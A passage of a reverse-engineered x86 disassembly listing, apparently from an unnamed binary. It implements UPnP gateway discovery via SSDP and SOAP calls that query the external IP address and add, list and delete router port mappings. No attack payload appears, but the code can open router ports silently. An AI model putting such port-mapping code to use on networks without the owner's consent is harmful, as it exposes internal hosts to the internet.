push eax ; Str
lea eax, [ebp+Dest]
push eax ; int
push dword ptr [ebp+len] ; len
lea eax, [ebp+cp]
push eax ; int
push [ebp+var_1C] ; int
push [ebp+s] ; s
call sub_9B4735
add esp, 18h
test eax, eax
jg short loc_9B4E17
or esi, 0FFFFFFFFh
jmp loc_9B4ED4
; ---------------------------------------------------------------------------
loc_9B4E17: ; CODE XREF: sub_9B4C5A+1B3�j
mov esi, [ebp+arg_18]
mov eax, [esi]
mov ebx, [ebp+arg_14]
or [ebp+var_18], 0FFFFFFFFh
or [ebp+var_10], 0FFFFFFFFh
and dword ptr [esi], 0
push 1388h
push eax
mov [ebp+buf], ebx
mov [ebp+var_4], eax
push ebx
jmp loc_9B4EBF
; ---------------------------------------------------------------------------
loc_9B4E3C: ; CODE XREF: sub_9B4C5A+272�j
sub [ebp+var_4], eax
add [ebp+buf], eax
add [esi], eax
mov eax, [esi]
add eax, ebx
cmp ebx, eax
mov edi, ebx
mov [ebp+var_14], eax
jnb short loc_9B4EA0
mov al, [ebx]
loc_9B4E53: ; CODE XREF: sub_9B4C5A+23B�j
and [ebp+arg_10], 0
cmp al, 0Dh
jz short loc_9B4E6E
mov ecx, edi
loc_9B4E5D: ; CODE XREF: sub_9B4C5A+212�j
cmp al, 0Dh
jz short loc_9B4E6E
cmp ecx, [ebp+var_14]
jnb short loc_9B4EA0
inc [ebp+arg_10]
inc ecx
mov al, [ecx]
jmp short loc_9B4E5D
; ---------------------------------------------------------------------------
loc_9B4E6E: ; CODE XREF: sub_9B4C5A+1FF�j
; sub_9B4C5A+205�j
mov eax, [ebp+arg_10]
mov ecx, edi
call sub_9B4826
test eax, eax
jle short loc_9B4E7F
mov [ebp+var_18], eax
loc_9B4E7F: ; CODE XREF: sub_9B4C5A+220�j
mov eax, [ebp+arg_10]
lea edi, [edi+eax+2]
mov al, [edi]
cmp al, 0Dh
jnz short loc_9B4E92
cmp byte ptr [edi+1], 0Ah
jz short loc_9B4E99
loc_9B4E92: ; CODE XREF: sub_9B4C5A+230�j
cmp edi, [ebp+var_14]
jb short loc_9B4E53
jmp short loc_9B4EA0
; ---------------------------------------------------------------------------
loc_9B4E99: ; CODE XREF: sub_9B4C5A+236�j
sub edi, ebx
inc edi
inc edi
mov [ebp+var_10], edi
loc_9B4EA0: ; CODE XREF: sub_9B4C5A+1F5�j
; sub_9B4C5A+20A�j ...
mov ecx, [ebp+var_18]
test ecx, ecx
jle short loc_9B4EB4
mov eax, [ebp+var_10]
test eax, eax
jle short loc_9B4EB4
add eax, ecx
cmp [esi], eax
jge short loc_9B4ED2
loc_9B4EB4: ; CODE XREF: sub_9B4C5A+24B�j
; sub_9B4C5A+252�j
push 1388h ; int
push [ebp+var_4] ; len
push [ebp+buf] ; buf
loc_9B4EBF: ; CODE XREF: sub_9B4C5A+1DD�j
push [ebp+s] ; s
call sub_9B4AC0
add esp, 10h
test eax, eax
jg loc_9B4E3C
loc_9B4ED2: ; CODE XREF: sub_9B4C5A+258�j
xor esi, esi
loc_9B4ED4: ; CODE XREF: sub_9B4C5A+1B8�j
push [ebp+s] ; s
call closesocket
mov eax, esi
loc_9B4EDF: ; CODE XREF: sub_9B4C5A+189�j
pop edi
pop esi
pop ebx
leave
retn
sub_9B4C5A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B4EE4(int, char *cp, int, int)
sub_9B4EE4 proc near ; CODE XREF: sub_9A90FF+3C�p
buf = byte ptr -644h
to = sockaddr ptr -44h
Dst = word ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
optval = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
Src = dword ptr -18h
var_14 = dword ptr -14h
Size = dword ptr -10h
var_C = dword ptr -0Ch
s = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
cp = dword ptr 0Ch
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 644h
push edi
push 11h ; protocol
push 2 ; type
xor edi, edi
push 2 ; af
mov [ebp+var_4], edi
mov dword ptr [ebp+optval], 1
call socket
cmp eax, edi
mov [ebp+s], eax
jge short loc_9B4F14
xor eax, eax
jmp loc_9B505A
; ---------------------------------------------------------------------------
loc_9B4F14: ; CODE XREF: sub_9B4EE4+27�j
push ebx
push esi
push 10h ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call memset
mov esi, ntohs
add esp, 0Ch
cmp [ebp+arg_C], edi
mov [ebp+Dst], 2
mov ebx, 76Ch
jz short loc_9B4F42
push ebx ; netshort
call esi ; ntohs
mov [ebp+var_32], ax
loc_9B4F42: ; CODE XREF: sub_9B4EE4+55�j
push 10h ; Size
lea eax, [ebp+to]
push edi ; Val
push eax ; Dst
mov [ebp+var_30], edi
call memset
add esp, 0Ch
push ebx ; netshort
mov [ebp+to.sa_family], 2
call esi ; ntohs
mov esi, __imp_inet_addr
push offset cp ; "239.255.255.250"
mov word ptr [ebp+to.sa_data], ax
call esi ; __imp_inet_addr
mov ebx, setsockopt
push 4 ; optlen
mov dword ptr [ebp+to.sa_data+2], eax
lea eax, [ebp+optval]
push eax ; optval
push 4 ; optname
push 0FFFFh ; level
push [ebp+s] ; s
call ebx ; setsockopt
test eax, eax
jge short loc_9B4F94
xor eax, eax
jmp loc_9B5058
; ---------------------------------------------------------------------------
loc_9B4F94: ; CODE XREF: sub_9B4EE4+A7�j
cmp [ebp+cp], edi
jz short loc_9B4FB2
push [ebp+cp] ; cp
call esi ; __imp_inet_addr
push 4 ; optlen
mov [ebp+Size], eax
mov [ebp+var_30], eax
lea eax, [ebp+Size]
push eax ; optval
push 9 ; optname
push edi ; level
push [ebp+s] ; s
call ebx ; setsockopt
loc_9B4FB2: ; CODE XREF: sub_9B4EE4+B3�j
push 10h ; namelen
lea eax, [ebp+Dst]
push eax ; name
push [ebp+s] ; s
call bind
test eax, eax
jnz loc_9B504D
mov [ebp+var_1C], edi
mov [ebp+var_C], offset off_9A6D24
jmp short loc_9B4FD7
; ---------------------------------------------------------------------------
loc_9B4FD5: ; CODE XREF: sub_9B4EE4+1A8�j
; sub_9B4EE4+1B2�j ...
xor edi, edi
loc_9B4FD7: ; CODE XREF: sub_9B4EE4+EF�j
; sub_9B4EE4+164�j
cmp [ebp+var_1C], edi
jnz short loc_9B501B
mov eax, [ebp+var_C]
push dword ptr [eax]
lea eax, [ebp+buf]
push offset aMSearchHttp1_1 ; "M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255."...
push 600h ; Count
push eax ; Dest
call _snprintf
add [ebp+var_C], 4
add esp, 10h
push 10h ; tolen
lea ecx, [ebp+to]
push ecx ; to
push edi ; flags
push eax ; len
lea eax, [ebp+buf]
push eax ; buf
push [ebp+s] ; s
call sendto
test eax, eax
jl short loc_9B504A
loc_9B501B: ; CODE XREF: sub_9B4EE4+F6�j
push [ebp+arg_0] ; int
lea eax, [ebp+buf]
push 600h ; len
push eax ; buf
push [ebp+s] ; s
call sub_9B4AC0
add esp, 10h
cmp eax, edi
mov [ebp+var_1C], eax
jl short loc_9B504A
jnz short loc_9B505D
cmp [ebp+var_4], edi
jnz short loc_9B504A
mov eax, [ebp+var_C]
cmp [eax], edi
jnz short loc_9B4FD7
loc_9B504A: ; CODE XREF: sub_9B4EE4+135�j
; sub_9B4EE4+156�j ...
mov edi, [ebp+var_4]
loc_9B504D: ; CODE XREF: sub_9B4EE4+DF�j
push [ebp+s] ; s
call closesocket
mov eax, edi
loc_9B5058: ; CODE XREF: sub_9B4EE4+AB�j
pop esi
pop ebx
loc_9B505A: ; CODE XREF: sub_9B4EE4+2B�j
pop edi
leave
retn
; ---------------------------------------------------------------------------
loc_9B505D: ; CODE XREF: sub_9B4EE4+158�j
lea ecx, [ebp+var_20]
push ecx
lea ecx, [ebp+var_14]
push ecx
lea ecx, [ebp+Size]
push ecx
lea ecx, [ebp+Src]
push ecx
push eax
lea ebx, [ebp+buf]
mov [ebp+Src], edi
mov [ebp+Size], edi
mov [ebp+var_14], edi
mov [ebp+var_20], edi
call sub_9B488E
add esp, 14h
cmp [ebp+var_14], 0
jz loc_9B4FD5
cmp [ebp+Src], 0
jz loc_9B4FD5
mov edi, [ebp+var_20]
mov ebx, [ebp+Size]
lea eax, [edi+ebx+10h]
push eax ; Size
call malloc
mov esi, eax
mov eax, [ebp+var_4]
push ebx ; Size
push [ebp+Src] ; Src
lea ecx, [esi+0Ch]
mov [esi], eax
lea eax, [esi+ebx+0Dh]
push ecx ; Dst
mov [esi+4], ecx
mov [esi+8], eax
call memcpy
push edi ; Size
push [ebp+var_14] ; Src
lea eax, [esi+ebx+0Dh]
push eax ; Dst
mov byte ptr [esi+ebx+0Ch], 0
call memcpy
lea eax, [esi+edi]
add esp, 1Ch
mov byte ptr [eax+ebx+0Dh], 0
mov [ebp+var_4], esi
jmp loc_9B4FD5
sub_9B4EE4 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9B50F1(int, void *Src, size_t Size)
sub_9B50F1 proc near ; DATA XREF: sub_9B517D+20�o
arg_0 = dword ptr 4
Src = dword ptr 8
Size = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+Size]
cmp edi, 3Fh
jle short loc_9B50FF
push 3Fh
pop edi
loc_9B50FF: ; CODE XREF: sub_9B50F1+9�j
mov esi, [esp+8+arg_0]
push edi ; Size
push [esp+0Ch+Src] ; Src
lea eax, [esi+4]
push eax ; Dst
call memcpy
add esp, 0Ch
mov byte ptr [esi+edi+4], 0
pop edi
pop esi
retn
sub_9B50F1 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9B511C(int, void *Src, size_t Size)
sub_9B511C proc near ; DATA XREF: sub_9B517D+2A�o
arg_0 = dword ptr 4
Src = dword ptr 8
Size = dword ptr 0Ch
push ebx
push esi
push edi
push 88h ; Size
call malloc
mov ebx, [esp+10h+Size]
cmp ebx, 3Fh
pop ecx
mov esi, eax
jle short loc_9B5139
push 3Fh
pop ebx
loc_9B5139: ; CODE XREF: sub_9B511C+18�j
mov edi, [esp+0Ch+arg_0]
push 40h ; Count
lea eax, [edi+4]
push eax ; Source
lea eax, [esi+8]
push eax ; Dest
call strncpy
push ebx ; Size
push [esp+1Ch+Src] ; Src
lea eax, [esi+48h]
push eax ; Dst
mov byte ptr [esi+47h], 0
call memcpy
mov byte ptr [esi+ebx+48h], 0
mov eax, [edi]
add esp, 18h
test eax, eax
mov [esi], eax
jz short loc_9B5174
mov eax, [edi]
mov [eax+4], esi
loc_9B5174: ; CODE XREF: sub_9B511C+51�j
mov [edi], esi
mov [esi+4], edi
pop edi
pop esi
pop ebx
retn
sub_9B511C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B517D proc near ; CODE XREF: sub_9B5214+5C�p
; sub_9B5353+65�p ...
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
mov eax, [ebp+arg_8]
mov edx, [ebp+arg_0]
xor ecx, ecx
mov [eax], ecx
mov [ebp+var_14], eax
mov [ebp+var_24], edx
mov edx, [ebp+arg_4]
lea eax, [ebp+var_24]
push eax
mov [ebp+var_18], edx
mov [ebp+var_10], offset sub_9B50F1
mov [ebp+var_C], ecx
mov [ebp+var_8], offset sub_9B511C
mov [ebp+var_4], ecx
call sub_9B450D
pop ecx
leave
retn
sub_9B517D endp
; =============== S U B R O U T I N E =======================================
sub_9B51B9 proc near ; CODE XREF: sub_9B5214+132�p
; sub_9B5353+C5�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
jmp short loc_9B51DB
; ---------------------------------------------------------------------------
loc_9B51C0: ; CODE XREF: sub_9B51B9+26�j
mov ecx, [eax]
test ecx, ecx
jz short loc_9B51CC
mov edx, [eax+4]
mov [ecx+4], edx
loc_9B51CC: ; CODE XREF: sub_9B51B9+B�j
mov ecx, [eax+4]
mov edx, [eax]
push eax ; Memory
mov [ecx], edx
call free
pop ecx
loc_9B51DB: ; CODE XREF: sub_9B51B9+5�j
mov eax, [esi]
test eax, eax
jnz short loc_9B51C0
pop esi
retn
sub_9B51B9 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9B51E3(int, char *Str2)
sub_9B51E3 proc near ; CODE XREF: sub_9B5214+6A�p
; sub_9B5214+7B�p ...
arg_0 = dword ptr 4
Str2 = dword ptr 8
mov eax, [esp+arg_0]
push esi
mov esi, [eax]
push edi
xor edi, edi
jmp short loc_9B520B
; ---------------------------------------------------------------------------
loc_9B51EF: ; CODE XREF: sub_9B51E3+2A�j
test edi, edi
jnz short loc_9B520F
push [esp+8+Str2] ; Str2
lea eax, [esi+8]
push eax ; Str1
call strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_9B5209
lea edi, [esi+48h]
loc_9B5209: ; CODE XREF: sub_9B51E3+21�j
mov esi, [esi]
loc_9B520B: ; CODE XREF: sub_9B51E3+A�j
test esi, esi
jnz short loc_9B51EF
loc_9B520F: ; CODE XREF: sub_9B51E3+E�j
mov eax, edi
pop edi
pop esi
retn
sub_9B51E3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B5214(char *Str, int, char *Source, int, char *Dest)
sub_9B5214 proc near ; CODE XREF: sub_9B4B2C+22�p
var_1054 = dword ptr -1054h
var_54 = dword ptr -54h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
Src = dword ptr -8
var_4 = dword ptr -4
Str = dword ptr 8
arg_4 = dword ptr 0Ch
Source = dword ptr 10h
arg_C = dword ptr 14h
Dest = dword ptr 18h
push ebp
mov ebp, esp
mov eax, 1054h
call __alloca_probe
or [ebp+var_4], 0FFFFFFFFh
push ebx
push esi
mov esi, [ebp+Source]
xor ebx, ebx
cmp esi, ebx
mov [ebp+var_C], 1000h
jnz short loc_9B5244
cmp [ebp+arg_C], ebx
jnz short loc_9B5244
push 0FFFFFFFEh
pop eax
jmp loc_9B534F
; ---------------------------------------------------------------------------
loc_9B5244: ; CODE XREF: sub_9B5214+21�j
; sub_9B5214+26�j
lea eax, [ebp+var_C]
push eax ; int
lea eax, [ebp+var_1054]
push eax ; int
push ebx ; int
push offset aGetstatusinfo ; "GetStatusInfo"
push [ebp+arg_4] ; int
push [ebp+Str] ; Str
push 0FFFFFFFFh ; s
call sub_9B4C5A
lea eax, [ebp+var_54]
push eax
push [ebp+var_C]
lea eax, [ebp+var_1054]
push eax
call sub_9B517D
lea eax, [ebp+var_54]
push offset aNewuptime ; "NewUptime"
push eax ; int
call sub_9B51E3
mov [ebp+Src], eax
lea eax, [ebp+var_54]
push offset aNewconnections ; "NewConnectionStatus"
push eax ; int
call sub_9B51E3
mov [ebp+Source], eax
lea eax, [ebp+var_54]
push offset aNewlastconnect ; "NewLastConnectionError"
push eax ; int
call sub_9B51E3
add esp, 40h
cmp [ebp+Source], ebx
mov [ebp+var_10], eax
jz short loc_9B52B8
cmp [ebp+Src], ebx
jz short loc_9B52B8
mov [ebp+var_4], ebx
loc_9B52B8: ; CODE XREF: sub_9B5214+9A�j
; sub_9B5214+9F�j
cmp esi, ebx
push edi
mov edi, strncpy
jz short loc_9B52DA
cmp [ebp+Source], ebx
jz short loc_9B52D8
push 40h ; Count
push [ebp+Source] ; Source
push esi ; Dest
call edi ; strncpy
add esp, 0Ch
mov [esi+3Fh], bl
jmp short loc_9B52DA
; ---------------------------------------------------------------------------
loc_9B52D8: ; CODE XREF: sub_9B5214+B2�j
mov [esi], bl
loc_9B52DA: ; CODE XREF: sub_9B5214+AD�j
; sub_9B5214+C2�j
cmp [ebp+arg_C], ebx
jz short loc_9B52F8
cmp [ebp+Src], ebx
jz short loc_9B52F8
push [ebp+arg_C]
push offset aU ; "%u"
push [ebp+Src] ; Src
call sscanf
add esp, 0Ch
loc_9B52F8: ; CODE XREF: sub_9B5214+C9�j
; sub_9B5214+CE�j
mov esi, [ebp+Dest]
cmp esi, ebx
jz short loc_9B5316
cmp [ebp+var_10], ebx
jz short loc_9B5314
push 40h ; Count
push [ebp+var_10] ; Source
push esi ; Dest
call edi ; strncpy
add esp, 0Ch
mov [esi+3Fh], bl
jmp short loc_9B5316
; ---------------------------------------------------------------------------
loc_9B5314: ; CODE XREF: sub_9B5214+EE�j
mov [esi], bl
loc_9B5316: ; CODE XREF: sub_9B5214+E9�j
; sub_9B5214+FE�j
lea eax, [ebp+var_54]
push offset aErrorcode ; "errorCode"
push eax ; int
call sub_9B51E3
cmp eax, ebx
pop ecx
pop ecx
pop edi
jz short loc_9B5342
or [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+var_4]
push ecx
push offset aD ; "%d"
push eax ; Src
call sscanf
add esp, 0Ch
loc_9B5342: ; CODE XREF: sub_9B5214+115�j
lea eax, [ebp+var_54]
push eax
call sub_9B51B9
mov eax, [ebp+var_4]
pop ecx
loc_9B534F: ; CODE XREF: sub_9B5214+2B�j
pop esi
pop ebx
leave
retn
sub_9B5214 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B5353(char *Str, int, char *Dest)
sub_9B5353 proc near ; CODE XREF: sub_9A9289+5F�p
var_104C = dword ptr -104Ch
var_4C = dword ptr -4Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Str = dword ptr 8
arg_4 = dword ptr 0Ch
Dest = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 104Ch
call __alloca_probe
or [ebp+var_4], 0FFFFFFFFh
push ebx
push esi
mov esi, [ebp+Dest]
xor ebx, ebx
cmp esi, ebx
mov [ebp+var_8], 1000h
jz loc_9B5423
cmp [ebp+Str], ebx
jz loc_9B5423
cmp [ebp+arg_4], ebx
jz loc_9B5423
lea eax, [ebp+var_8]
push eax ; int
lea eax, [ebp+var_104C]
push eax ; int
push ebx ; int
push offset aGetexternalipa ; "GetExternalIPAddress"
push [ebp+arg_4] ; int
push [ebp+Str] ; Str
push 0FFFFFFFFh ; s
call sub_9B4C5A
lea eax, [ebp+var_4C]
push eax
push [ebp+var_8]
lea eax, [ebp+var_104C]
push eax
call sub_9B517D
lea eax, [ebp+var_4C]
push offset aNewexternalipa ; "NewExternalIPAddress"
push eax ; int
call sub_9B51E3
add esp, 30h
cmp eax, ebx
jz short loc_9B53E7
push 10h ; Count
push eax ; Source
push esi ; Dest
call strncpy
add esp, 0Ch
mov [esi+0Fh], bl
mov [ebp+var_4], ebx
jmp short loc_9B53E9
; ---------------------------------------------------------------------------
loc_9B53E7: ; CODE XREF: sub_9B5353+7D�j
mov [esi], bl
loc_9B53E9: ; CODE XREF: sub_9B5353+92�j
lea eax, [ebp+var_4C]
push offset aErrorcode ; "errorCode"
push eax ; int
call sub_9B51E3
cmp eax, ebx
pop ecx
pop ecx
jz short loc_9B5414
or [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+var_4]
push ecx
push offset aD ; "%d"
push eax ; Src
call sscanf
add esp, 0Ch
loc_9B5414: ; CODE XREF: sub_9B5353+A8�j
lea eax, [ebp+var_4C]
push eax
call sub_9B51B9
mov eax, [ebp+var_4]
pop ecx
jmp short loc_9B5426
; ---------------------------------------------------------------------------
loc_9B5423: ; CODE XREF: sub_9B5353+21�j
; sub_9B5353+2A�j ...
push 0FFFFFFFEh
pop eax
loc_9B5426: ; CODE XREF: sub_9B5353+CE�j
pop esi
pop ebx
leave
retn
sub_9B5353 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B542A(char *Str, int, int, int, int, int, int)
sub_9B542A proc near ; CODE XREF: sub_9A932E+CF�p
var_104C = dword ptr -104Ch
var_4C = dword ptr -4Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Str = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
mov eax, 104Ch
call __alloca_probe
cmp [ebp+arg_C], 0
push ebx
push edi
mov [ebp+var_8], 1000h
jz loc_9B555A
cmp [ebp+arg_10], 0
jz loc_9B555A
mov ebx, [ebp+arg_18]
test ebx, ebx
jz loc_9B555A
mov edi, [ebp+arg_8]
test edi, edi
jz loc_9B555A
push esi
push 8 ; SizeOfElements
push 9 ; NumOfElements
call calloc
mov esi, eax
mov eax, [ebp+arg_C]
mov [esi+1Ch], eax
mov eax, [ebp+arg_10]
mov [esi+24h], eax
mov eax, [ebp+arg_14]
test eax, eax
pop ecx
pop ecx
mov dword ptr [esi], offset aNewremotehost ; "NewRemoteHost"
mov dword ptr [esi+8], offset aNewexternalpor ; "NewExternalPort"
mov [esi+0Ch], edi
mov dword ptr [esi+10h], offset aNewprotocol ; "NewProtocol"
mov [esi+14h], ebx
mov dword ptr [esi+18h], offset aNewinternalpor ; "NewInternalPort"
mov dword ptr [esi+20h], offset aNewinternalcli ; "NewInternalClient"
mov dword ptr [esi+28h], offset aNewenabled ; "NewEnabled"
mov dword ptr [esi+2Ch], offset a1 ; "1"
mov dword ptr [esi+30h], offset aNewportmapping ; "NewPortMappingDescription"
jnz short loc_9B54CE
mov eax, offset Password
loc_9B54CE: ; CODE XREF: sub_9B542A+9D�j
mov [esi+34h], eax
lea eax, [ebp+var_8]
push eax ; int
lea eax, [ebp+var_104C]
push eax ; int
push esi ; int
push offset aAddportmapping ; "AddPortMapping"
push [ebp+arg_4] ; int
mov dword ptr [esi+38h], offset aNewleasedurati ; "NewLeaseDuration"
push [ebp+Str] ; Str
mov dword ptr [esi+3Ch], offset PrefixString ; "0"
push 0FFFFFFFFh ; s
call sub_9B4C5A
lea eax, [ebp+var_4C]
push eax
push [ebp+var_8]
lea eax, [ebp+var_104C]
push eax
call sub_9B517D
lea eax, [ebp+var_4C]
push offset aErrorcode ; "errorCode"
push eax ; int
call sub_9B51E3
add esp, 30h
test eax, eax
jz short loc_9B553E
or [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+var_4]
push ecx
push offset aD ; "%d"
push eax ; Src
call sscanf
add esp, 0Ch
jmp short loc_9B5542
; ---------------------------------------------------------------------------
loc_9B553E: ; CODE XREF: sub_9B542A+F9�j
and [ebp+var_4], 0
loc_9B5542: ; CODE XREF: sub_9B542A+112�j
lea eax, [ebp+var_4C]
push eax
call sub_9B51B9
push esi ; Memory
call free
mov eax, [ebp+var_4]
pop ecx
pop ecx
pop esi
jmp short loc_9B555D
; ---------------------------------------------------------------------------
loc_9B555A: ; CODE XREF: sub_9B542A+1A�j
; sub_9B542A+24�j ...
push 0FFFFFFFEh
pop eax
loc_9B555D: ; CODE XREF: sub_9B542A+12E�j
pop edi
pop ebx
leave
retn
sub_9B542A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B5561(char *Str, int, int, int)
sub_9B5561 proc near ; CODE XREF: sub_9A9199+C6�p
var_1048 = dword ptr -1048h
var_48 = dword ptr -48h
var_4 = dword ptr -4
Str = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, 1048h
call __alloca_probe
push ebx
mov ebx, [ebp+arg_8]
test ebx, ebx
push edi
mov [ebp+var_4], 1000h
jz loc_9B562F
mov edi, [ebp+arg_C]
test edi, edi
jz loc_9B562F
push esi
push 8 ; SizeOfElements
push 4 ; NumOfElements
call calloc
mov esi, eax
lea eax, [ebp+var_4]
push eax ; int
lea eax, [ebp+var_1048]
push eax ; int
push esi ; int
push offset aDeleteportmapp ; "DeletePortMapping"
push [ebp+arg_4] ; int
mov dword ptr [esi], offset aNewremotehost ; "NewRemoteHost"
push [ebp+Str] ; Str
mov dword ptr [esi+8], offset aNewexternalpor ; "NewExternalPort"
push 0FFFFFFFFh ; s
mov [esi+0Ch], ebx
mov dword ptr [esi+10h], offset aNewprotocol ; "NewProtocol"
mov [esi+14h], edi
call sub_9B4C5A
lea eax, [ebp+var_48]
push eax
push [ebp+var_4]
lea eax, [ebp+var_1048]
push eax
call sub_9B517D
lea eax, [ebp+var_48]
push offset aErrorcode ; "errorCode"
push eax ; int
call sub_9B51E3
add esp, 38h
test eax, eax
jz short loc_9B5613
or [ebp+arg_8], 0FFFFFFFFh
lea ecx, [ebp+arg_8]
push ecx
push offset aD ; "%d"
push eax ; Src
call sscanf
add esp, 0Ch
jmp short loc_9B5617
; ---------------------------------------------------------------------------
loc_9B5613: ; CODE XREF: sub_9B5561+97�j
and [ebp+arg_8], 0
loc_9B5617: ; CODE XREF: sub_9B5561+B0�j
lea eax, [ebp+var_48]
push eax
call sub_9B51B9
push esi ; Memory
call free
mov eax, [ebp+arg_8]
pop ecx
pop ecx
pop esi
jmp short loc_9B5632
; ---------------------------------------------------------------------------
loc_9B562F: ; CODE XREF: sub_9B5561+1B�j
; sub_9B5561+26�j
push 0FFFFFFFEh
pop eax
loc_9B5632: ; CODE XREF: sub_9B5561+CC�j
pop edi
pop ebx
leave
retn
sub_9B5561 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B5636(char *Str, int, void *Memory, int, int, int, int, int, int, char *Dest, int)
sub_9B5636 proc near ; CODE XREF: sub_9A9199+81�p
var_104C = dword ptr -104Ch
var_4C = dword ptr -4Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Str = dword ptr 8
arg_4 = dword ptr 0Ch
Memory = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
Dest = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
mov eax, 104Ch
call __alloca_probe
or [ebp+var_4], 0FFFFFFFFh
push ebx
push esi
mov esi, [ebp+Memory]
xor ebx, ebx
cmp esi, ebx
mov [ebp+var_8], 1000h
jnz short loc_9B5661
push 0FFFFFFFEh
pop eax
jmp loc_9B5833
; ---------------------------------------------------------------------------
loc_9B5661: ; CODE XREF: sub_9B5636+21�j
mov eax, [ebp+arg_10]
push edi
mov [eax], bl
mov eax, [ebp+arg_14]
push 8 ; SizeOfElements
push 2 ; NumOfElements
mov [eax], bl
call calloc
lea ecx, [ebp+var_8]
push ecx ; int
lea ecx, [ebp+var_104C]
push ecx ; int
push eax ; int
push offset aGetgenericport ; "GetGenericPortMappingEntry"
push [ebp+arg_4] ; int
mov [ebp+Memory], eax
push [ebp+Str] ; Str
mov dword ptr [eax], offset aNewportmappi_0 ; "NewPortMappingIndex"
push 0FFFFFFFFh ; s
mov [eax+4], esi
call sub_9B4C5A
lea eax, [ebp+var_4C]
push eax
push [ebp+var_8]
lea eax, [ebp+var_104C]
push eax
call sub_9B517D
lea eax, [ebp+var_4C]
push offset aNewremotehost ; "NewRemoteHost"
push eax ; int
call sub_9B51E3
mov esi, strncpy
add esp, 38h
cmp eax, ebx
jz short loc_9B56E1
mov edi, [ebp+Dest]
cmp edi, ebx
jz short loc_9B56E1
push 40h ; Count
push eax ; Source
push edi ; Dest
call esi ; strncpy
add esp, 0Ch
mov [edi+3Fh], bl
loc_9B56E1: ; CODE XREF: sub_9B5636+96�j
; sub_9B5636+9D�j
lea eax, [ebp+var_4C]
push offset aNewexternalpor ; "NewExternalPort"
push eax ; int
call sub_9B51E3
cmp eax, ebx
pop ecx
pop ecx
jz short loc_9B570B
mov edi, [ebp+arg_C]
cmp edi, ebx
jz short loc_9B570B
push 6 ; Count
push eax ; Source
push edi ; Dest
call esi ; strncpy
add esp, 0Ch
mov [edi+5], bl
mov [ebp+var_4], ebx
loc_9B570B: ; CODE XREF: sub_9B5636+BD�j
; sub_9B5636+C4�j
lea eax, [ebp+var_4C]
push offset aNewprotocol ; "NewProtocol"
push eax ; int
call sub_9B51E3
cmp eax, ebx
pop ecx
pop ecx
jz short loc_9B5732
mov edi, [ebp+arg_18]
cmp edi, ebx
jz short loc_9B5732
push 4 ; Count
push eax ; Source
push edi ; Dest
call esi ; strncpy
add esp, 0Ch
mov [edi+3], bl
loc_9B5732: ; CODE XREF: sub_9B5636+E7�j
; sub_9B5636+EE�j
lea eax, [ebp+var_4C]
push offset aNewinternalcli ; "NewInternalClient"
push eax ; int
call sub_9B51E3
cmp eax, ebx
pop ecx
pop ecx
jz short loc_9B5758
mov edi, [ebp+arg_10]
push 10h ; Count
push eax ; Source
push edi ; Dest
call esi ; strncpy
add esp, 0Ch
mov [edi+0Fh], bl
mov [ebp+var_4], ebx
loc_9B5758: ; CODE XREF: sub_9B5636+10E�j
lea eax, [ebp+var_4C]
push offset aNewinternalpor ; "NewInternalPort"
push eax ; int
call sub_9B51E3
cmp eax, ebx
pop ecx
pop ecx
jz short loc_9B577B
mov edi, [ebp+arg_14]
push 6 ; Count
push eax ; Source
push edi ; Dest
call esi ; strncpy
add esp, 0Ch
mov [edi+5], bl
loc_9B577B: ; CODE XREF: sub_9B5636+134�j
lea eax, [ebp+var_4C]
push offset aNewenabled ; "NewEnabled"
push eax ; int
call sub_9B51E3
cmp eax, ebx
pop ecx
pop ecx
jz short loc_9B57A2
mov edi, [ebp+arg_20]
cmp edi, ebx
jz short loc_9B57A2
push 4 ; Count
push eax ; Source
push edi ; Dest
call esi ; strncpy
add esp, 0Ch
mov [edi+3], bl
loc_9B57A2: ; CODE XREF: sub_9B5636+157�j
; sub_9B5636+15E�j
lea eax, [ebp+var_4C]
push offset aNewportmapping ; "NewPortMappingDescription"
push eax ; int
